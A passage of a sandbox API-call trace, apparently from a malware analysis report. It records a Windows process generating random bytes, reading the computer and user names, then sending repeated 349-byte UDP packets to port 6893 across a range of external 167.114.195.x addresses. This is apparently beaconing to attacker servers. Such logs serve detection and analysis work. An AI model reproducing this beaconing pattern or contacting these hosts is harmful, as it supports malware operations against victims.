RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x447894*=0x28e6f8) returned 1 [0044.627] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0044.627] CryptGenRandom (in: hProv=0x28e6f8, dwLen=0x1388, pbBuffer=0x29dfa0 | out: pbBuffer=0x29dfa0) returned 1 [0044.628] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0044.628] CryptReleaseContext (hProv=0x28e6f8, dwFlags=0x0) returned 1 [0044.628] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x769f0000 [0044.628] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0044.628] CryptAcquireContextW (in: phProv=0x447894, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x447894*=0x28e6f8) returned 1 [0044.628] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0044.629] CryptGenRandom (in: hProv=0x28e6f8, dwLen=0x1388, pbBuffer=0x29dfa0 | out: pbBuffer=0x29dfa0) returned 1 [0044.629] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0044.629] CryptReleaseContext (hProv=0x28e6f8, dwFlags=0x0) returned 1 [0044.629] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x769f0000 [0044.629] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0044.629] CryptAcquireContextW (in: phProv=0x447894, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x447894*=0x28e6f8) returned 1 [0044.631] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0044.631] CryptGenRandom (in: hProv=0x28e6f8, dwLen=0x1388, pbBuffer=0x29dfa0 | out: pbBuffer=0x29dfa0) returned 1 [0044.632] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0044.632] CryptReleaseContext (hProv=0x28e6f8, dwFlags=0x0) returned 1 [0044.632] GetModuleHandleW (lpModuleName="advapi32.dll") returned 0x769f0000 [0044.632] GetProcAddress (hModule=0x769f0000, lpProcName="CryptAcquireContextW") returned 0x769fdf14 [0044.632] CryptAcquireContextW (in: phProv=0x447894, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x447894*=0x28e6f8) returned 1 [0044.633] GetProcAddress (hModule=0x769f0000, lpProcName="CryptGenRandom") returned 0x769fdfc8 [0044.633] CryptGenRandom (in: hProv=0x28e6f8, dwLen=0x1388, pbBuffer=0x29dfa0 | out: pbBuffer=0x29dfa0) returned 1 [0044.633] GetProcAddress (hModule=0x769f0000, lpProcName="CryptReleaseContext") returned 0x769fe124 [0044.633] CryptReleaseContext (hProv=0x28e6f8, dwFlags=0x0) returned 1 [0044.633] GetFileVersionInfoSizeW (in: lptstrFilename="ntdll.dll", lpdwHandle=0x12f050 | out: lpdwHandle=0x12f050) returned 0x704 [0044.667] GetFileVersionInfoW (in: lptstrFilename="ntdll.dll", dwHandle=0x0, dwLen=0x704, lpData=0x285e58 | out: lpData=0x285e58) returned 1 [0044.667] VerQueryValueW (in: pBlock=0x285e58, lpSubBlock="\\", lplpBuffer=0x12f034, puLen=0x44a118 | out: lplpBuffer=0x12f034*=0x285e80, puLen=0x44a118) returned 1 [0044.668] GetComputerNameW (in: lpBuffer=0x11f054, nSize=0x11f050 | out: lpBuffer="CRH2YWU7", nSize=0x11f050) returned 1 [0044.668] GetUserNameW (in: lpBuffer=0x11f054, pcbBuffer=0x11f050 | out: lpBuffer="EEBsYm5", pcbBuffer=0x11f050) returned 1 [0044.942] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x12ef98 | out: lpWSAData=0x12ef98) returned 0 [0044.948] socket (af=2, type=2, protocol=0) returned 0xcc [0045.219] htons (hostshort=0x1af5) returned 0xf51a [0045.219] inet_addr (cp="167.114.194.225") returned 0xe1c272a7 [0045.219] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.225"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.220] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.226"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.220] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.227"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.220] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.228"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.220] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.229"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.220] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.230"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.220] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.231"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.221] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.232"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.221] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.233"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.221] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.234"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.221] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.235"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.221] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.236"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.221] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.237"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.221] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.238"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.221] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.239"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.221] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.240"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.222] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.241"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.222] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.242"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.222] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.243"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.222] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.244"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.222] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.245"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.222] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.246"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.222] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.247"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.222] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.248"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.222] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.249"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.223] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.250"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.238] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.251"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.239] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.252"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.239] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.253"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.239] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.254"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.239] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.1"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.239] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.2"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.240] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.3"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.240] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.4"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.240] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.5"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.240] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.6"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.240] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.7"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.241] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.8"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.241] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.9"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.241] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.10"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.241] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.11"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.241] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.12"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.242] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.13"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.242] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.14"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.242] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.15"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.242] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.16"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.242] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.17"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.242] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.18"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.243] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.19"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.243] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.20"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.243] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.21"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.243] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.22"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.243] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.23"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.243] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.24"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.244] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.25"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.244] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.26"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.244] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.27"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.244] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.28"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.244] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.29"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.245] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.30"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.245] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.31"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.245] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.32"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.245] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.33"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.245] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.34"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.245] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.35"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.246] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.36"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.246] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.37"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.246] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.38"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.246] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.39"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.246] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.40"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.246] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.41"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.246] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.42"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.246] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.43"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.247] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.44"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.247] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.45"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.247] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.46"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.247] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.47"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.247] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.48"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.247] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.49"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.247] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.50"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.247] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.51"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.247] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.52"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.247] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.53"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.248] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.54"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.248] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.55"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.248] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.56"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.248] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.57"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.248] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.58"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.249] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.59"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.249] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.60"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.249] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.61"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.249] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.62"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.249] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.63"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.249] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.64"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.249] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.65"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.250] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.66"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.250] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.67"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.250] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.68"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.250] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.69"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.250] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.70"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.250] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.71"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.250] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.72"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.250] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.73"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.250] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.74"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.251] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.75"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.251] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.76"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.251] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.77"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.251] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.78"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.251] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.79"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.251] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.80"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.251] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.81"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.251] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.82"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.252] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.83"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.258] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.84"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.261] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.85"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.261] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.86"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.261] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.87"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.262] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.88"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.262] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.89"), tolen=16 | out: buf=0x29efe0*) returned 349 [0045.262] sendto (in: s=0xcc, buf=0x29efe0*, len=349, flags=0, to=0x12f12c*(sa_family=2, sin_port=0x1af5, sin_addr="167.114.195.90"), tolen=16 | out: buf=0x29efe0*) returned 